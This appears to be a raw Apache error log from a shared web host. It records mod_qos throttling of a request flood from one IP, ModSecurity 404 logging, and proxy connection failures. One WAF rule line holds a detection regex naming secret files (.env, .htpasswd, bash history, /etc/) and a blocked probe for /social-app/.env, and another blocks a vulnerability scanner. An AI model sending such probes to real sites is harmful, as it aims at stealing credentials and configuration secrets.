[Tue May 26 19:53:58.787819 2026] [qos:error] [pid 86490:tid 86727] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KyYQAAAPA
[Tue May 26 19:53:58.788005 2026] [qos:error] [pid 86490:tid 86691] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KyYwAAAMw
[Tue May 26 19:53:58.788500 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KyZAAAAM4
[Tue May 26 19:53:58.788577 2026] [qos:error] [pid 86490:tid 86727] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KyZgAAAPA
[Tue May 26 19:53:58.788685 2026] [qos:error] [pid 86490:tid 86716] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KyZQAAAOU
[Tue May 26 19:53:58.788824 2026] [qos:error] [pid 86490:tid 86625] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KyYgAAAIo
[Tue May 26 19:53:58.790430 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KyZwAAAPs
[Tue May 26 19:53:58.792710 2026] [qos:error] [pid 86490:tid 86630] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KyaAAAAI8
[Tue May 26 19:53:58.795536 2026] [qos:error] [pid 86490:tid 86724] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KyaQAAAO0
[Tue May 26 19:53:58.917867 2026] [security2:error] [pid 93868:tid 94373] [client 185.177.72.53:63430] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/social-app/.env"] [unique_id "ahWs_kqK9k_ZUB2Vp25FegAAAgI"]
[Tue May 26 19:53:58.935494 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_mDRMqfxdEDkoszMgQAAAEA
[Tue May 26 19:53:58.938498 2026] [qos:error] [pid 86490:tid 86643] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KybAAAAJw
[Tue May 26 19:53:58.940355 2026] [qos:error] [pid 86490:tid 86636] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KybQAAAJU
[Tue May 26 19:53:58.941223 2026] [qos:error] [pid 86490:tid 86636] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KybgAAAJU
[Tue May 26 19:53:58.941807 2026] [qos:error] [pid 86490:tid 86657] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KybwAAAKo
[Tue May 26 19:53:58.942432 2026] [qos:error] [pid 86490:tid 86640] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KycAAAAJk
[Tue May 26 19:53:58.942609 2026] [qos:error] [pid 86490:tid 86678] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KycQAAAL8
[Tue May 26 19:53:58.947518 2026] [qos:error] [pid 86490:tid 86744] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KycgAAAQE
[Tue May 26 19:53:58.948533 2026] [qos:error] [pid 86490:tid 86744] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KycwAAAQE
[Tue May 26 19:53:58.952518 2026] [qos:error] [pid 86490:tid 86651] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_lZMwN0DpLVWo6KydAAAAKQ
[Tue May 26 19:53:59.017041 2026] [security2:error] [pid 93867:tid 94229] [client 3.237.65.43:57439] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 43.65.237.3.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.jailanitradingcompany.com"] [uri "/images/images/cache.php"] [unique_id "ahWs_5CDfrjqoHpuuBKscQAAAYA"], referer: www.google.com
[Tue May 26 19:53:59.087944 2026] [qos:error] [pid 86490:tid 86638] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyeAAAAJc
[Tue May 26 19:53:59.088258 2026] [qos:error] [pid 86490:tid 86731] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyeQAAAPQ
[Tue May 26 19:53:59.095867 2026] [qos:error] [pid 86490:tid 86697] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyewAAANI
[Tue May 26 19:53:59.096073 2026] [qos:error] [pid 86490:tid 86652] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyegAAAKU
[Tue May 26 19:53:59.096483 2026] [qos:error] [pid 93576:tid 93743] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_2DRMqfxdEDkoszMggAAAB8
[Tue May 26 19:53:59.096665 2026] [qos:error] [pid 86490:tid 86697] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyfAAAANI
[Tue May 26 19:53:59.099729 2026] [qos:error] [pid 86490:tid 86626] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyfgAAAIs
[Tue May 26 19:53:59.099733 2026] [qos:error] [pid 86490:tid 86709] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyfQAAAN4
[Tue May 26 19:53:59.102010 2026] [qos:error] [pid 86490:tid 86646] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyfwAAAJ8
[Tue May 26 19:53:59.104945 2026] [qos:error] [pid 86490:tid 86692] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KygAAAAM0
[Tue May 26 19:53:59.222348 2026] [security2:error] [pid 93867:tid 94019] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsbAAAAQ8"]
[Tue May 26 19:53:59.238014 2026] [qos:error] [pid 86490:tid 86711] [client 45.148.10.120:35092] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyhAAAAOA
[Tue May 26 19:53:59.238280 2026] [qos:error] [pid 86490:tid 86700] [client 45.148.10.120:34880] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyhQAAANU
[Tue May 26 19:53:59.246497 2026] [qos:error] [pid 93576:tid 93747] [client 45.148.10.120:35278] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_2DRMqfxdEDkoszMgwAAACM
[Tue May 26 19:53:59.248195 2026] [qos:error] [pid 86490:tid 86653] [client 45.148.10.120:35048] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyhwAAAKY
[Tue May 26 19:53:59.248819 2026] [qos:error] [pid 86490:tid 86710] [client 45.148.10.120:34924] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyigAAAN8
[Tue May 26 19:53:59.249383 2026] [qos:error] [pid 86490:tid 86723] [client 45.148.10.120:35326] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyiQAAAOw
[Tue May 26 19:53:59.251172 2026] [qos:error] [pid 86490:tid 86676] [client 45.148.10.120:34958] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyiwAAAL0
[Tue May 26 19:53:59.251322 2026] [qos:error] [pid 86490:tid 86695] [client 45.148.10.120:35136] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyjAAAANA
[Tue May 26 19:53:59.252671 2026] [qos:error] [pid 86490:tid 86634] [client 45.148.10.120:35000] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyjQAAAJM
[Tue May 26 19:53:59.259356 2026] [qos:error] [pid 86490:tid 86715] [client 45.148.10.120:34892] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KykAAAAOQ
[Tue May 26 19:53:59.278028 2026] [security2:error] [pid 86490:tid 86620] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6Kx9QAAAIU"]
[Tue May 26 19:53:59.281863 2026] [security2:error] [pid 86490:tid 86706] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6Kx5wAAANs"]
[Tue May 26 19:53:59.290991 2026] [security2:error] [pid 86490:tid 86689] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6Kx_QAAAMo"]
[Tue May 26 19:53:59.300484 2026] [security2:error] [pid 86490:tid 86713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6Kx5QAAAOI"]
[Tue May 26 19:53:59.306153 2026] [security2:error] [pid 86490:tid 86639] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6Kx9gAAAJg"]
[Tue May 26 19:53:59.313545 2026] [security2:error] [pid 86490:tid 86628] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6Kx6wAAAI0"]
[Tue May 26 19:53:59.315886 2026] [security2:error] [pid 93576:tid 93736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_WDRMqfxdEDkoszMTQAAABg"]
[Tue May 26 19:53:59.329550 2026] [security2:error] [pid 93867:tid 94239] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_ZCDfrjqoHpuuBKsOAAAAYU"]
[Tue May 26 19:53:59.330886 2026] [security2:error] [pid 86490:tid 86686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6KyAQAAAMc"]
[Tue May 26 19:53:59.345256 2026] [security2:error] [pid 86490:tid 86682] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6Kx-QAAAMM"]
[Tue May 26 19:53:59.348346 2026] [proxy:error] [pid 93867:tid 94110] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:53:59.348446 2026] [proxy_http:error] [pid 93867:tid 94110] [client 167.71.5.127:32864] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: https://cpcontacts.tickerbell.tech/
[Tue May 26 19:53:59.349338 2026] [proxy:error] [pid 93867:tid 94110] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 19:53:59.349391 2026] [proxy_http:error] [pid 93867:tid 94110] [client 167.71.5.127:32864] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: https://cpcontacts.tickerbell.tech/
[Tue May 26 19:53:59.359092 2026] [security2:error] [pid 93576:tid 93797] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_mDRMqfxdEDkoszMYgAAAFU"]
[Tue May 26 19:53:59.367318 2026] [security2:error] [pid 86490:tid 86725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_VZMwN0DpLVWo6KyBAAAAO4"]
[Tue May 26 19:53:59.373688 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_mDRMqfxdEDkoszMbgAAACU"]
[Tue May 26 19:53:59.381438 2026] [security2:error] [pid 93576:tid 93834] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_mDRMqfxdEDkoszMdAAAAHo"]
[Tue May 26 19:53:59.382160 2026] [security2:error] [pid 93867:tid 94138] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsRgAAAVc"]
[Tue May 26 19:53:59.382494 2026] [security2:error] [pid 93576:tid 93827] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_mDRMqfxdEDkoszMZwAAAHM"]
[Tue May 26 19:53:59.392954 2026] [security2:error] [pid 93867:tid 94067] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsRAAAATY"]
[Tue May 26 19:53:59.400961 2026] [security2:error] [pid 93867:tid 94142] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsTQAAAVk"]
[Tue May 26 19:53:59.408333 2026] [security2:error] [pid 93867:tid 94164] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsSwAAAWM"]
[Tue May 26 19:53:59.411474 2026] [security2:error] [pid 93867:tid 94233] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsUgAAAYI"]
[Tue May 26 19:53:59.429855 2026] [security2:error] [pid 93576:tid 93789] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_mDRMqfxdEDkoszMcgAAAE0"]
[Tue May 26 19:53:59.435215 2026] [security2:error] [pid 93867:tid 94146] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsVwAAAVs"]
[Tue May 26 19:53:59.435914 2026] [security2:error] [pid 93576:tid 93748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_mDRMqfxdEDkoszMbQAAACQ"]
[Tue May 26 19:53:59.440160 2026] [security2:error] [pid 93867:tid 94135] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsQgAAAVY"]
[Tue May 26 19:53:59.444869 2026] [security2:error] [pid 93867:tid 94020] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsTwAAARA"]
[Tue May 26 19:53:59.445956 2026] [security2:error] [pid 93867:tid 94048] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsUQAAASw"]
[Tue May 26 19:53:59.452431 2026] [security2:error] [pid 93867:tid 94116] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_pCDfrjqoHpuuBKsVAAAAU0"]
[Tue May 26 19:53:59.554785 2026] [qos:error] [pid 93576:tid 93833] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs_2DRMqfxdEDkoszMmwAAAHk
[Tue May 26 19:53:59.565058 2026] [qos:error] [pid 93868:tid 94341] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWs_0qK9k_ZUB2Vp25FmgAAAeI
[Tue May 26 19:53:59.566712 2026] [qos:error] [pid 86490:tid 86620] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyrgAAAIU
[Tue May 26 19:53:59.579996 2026] [qos:error] [pid 86490:tid 86704] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyrwAAANk
[Tue May 26 19:53:59.586269 2026] [qos:error] [pid 86490:tid 86691] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KysAAAAMw
[Tue May 26 19:53:59.589882 2026] [qos:error] [pid 86490:tid 86681] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KysQAAAMI
[Tue May 26 19:53:59.592906 2026] [qos:error] [pid 86490:tid 86706] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KysgAAANs
[Tue May 26 19:53:59.598498 2026] [qos:error] [pid 86490:tid 86670] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyswAAALc
[Tue May 26 19:53:59.600647 2026] [qos:error] [pid 86490:tid 86733] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KytAAAAPY
[Tue May 26 19:53:59.604612 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_2DRMqfxdEDkoszMoAAAADs
[Tue May 26 19:53:59.768181 2026] [qos:error] [pid 86490:tid 86693] [client 45.148.10.120:34796] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KytgAAAM4
[Tue May 26 19:53:59.768406 2026] [qos:error] [pid 86490:tid 86667] [client 45.148.10.120:35208] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KytwAAALQ
[Tue May 26 19:53:59.776150 2026] [qos:error] [pid 86490:tid 86716] [client 45.148.10.120:35184] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyuAAAAOU
[Tue May 26 19:53:59.777019 2026] [qos:error] [pid 86490:tid 86625] [client 45.148.10.120:35028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyuQAAAIo
[Tue May 26 19:53:59.780812 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:34792] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyugAAALM
[Tue May 26 19:53:59.781074 2026] [qos:error] [pid 86490:tid 86738] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyuwAAAPs
[Tue May 26 19:53:59.781546 2026] [qos:error] [pid 86490:tid 86666] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyvAAAALM
[Tue May 26 19:53:59.783813 2026] [qos:error] [pid 93576:tid 93735] [client 45.148.10.120:35308] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_2DRMqfxdEDkoszMowAAABc
[Tue May 26 19:53:59.785184 2026] [qos:error] [pid 86490:tid 86639] [client 45.148.10.120:35238] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyvQAAAJg
[Tue May 26 19:53:59.786666 2026] [qos:error] [pid 86490:tid 86628] [client 45.148.10.120:35222] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWs_1ZMwN0DpLVWo6KyvgAAAI0
[Tue May 26 19:54:00.283845 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWs_mDRMqfxdEDkoszMfQAAAGw"]
